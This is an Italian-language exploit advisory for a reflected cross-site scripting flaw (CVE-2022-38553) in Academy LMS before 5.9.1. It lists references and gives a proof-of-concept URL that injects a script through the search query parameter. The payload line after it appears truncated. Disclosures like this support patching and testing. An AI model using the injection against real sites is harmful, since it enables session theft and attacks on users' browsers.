
Proof-of-concept per cross-site scripting riflesso nelle versioni di Academy LMS precedenti alla 5.9.1, attivato tramite il parametro search?query per eseguire JavaScript arbitrario.
CROSS SITE SCRIPTING (XSS) SU "ACADEMY LEARNING MANAGEMENT SYSTEM" < v5.9.1 - PROVA DI CONCETTO (POC) CVE-2022-38553
Titolo Exploit: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 - Cross Site Scripting (XSS)
ID CVE: CVE-2022-38553
Autore Exploit: 4websecurity
Pagina web dell'autore: https://4websecurity.com
Data: 16-08-2022
Homepage del fornitore: https://creativeitem.com
Versione: fino alla 5.9.1
Pagina demo del fornitore: https://demo.creativeitem.com/academy/home/
Riferimenti:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
Campo di vulnerabilità:
La vulnerabilità Cross-site scripting (XSS) in ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 consente a un attaccante remoto di iniettare script web arbitrari o HTML tramite il parametro search?query.
Prova di Concetto (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
Payload:
">

Rischio di sicurezza:
Questa vulnerabilità di sicurezza consente di eseguire codice JavaScript arbitrario nel browser dell'utente se accede a un URL preparato dagli attaccanti.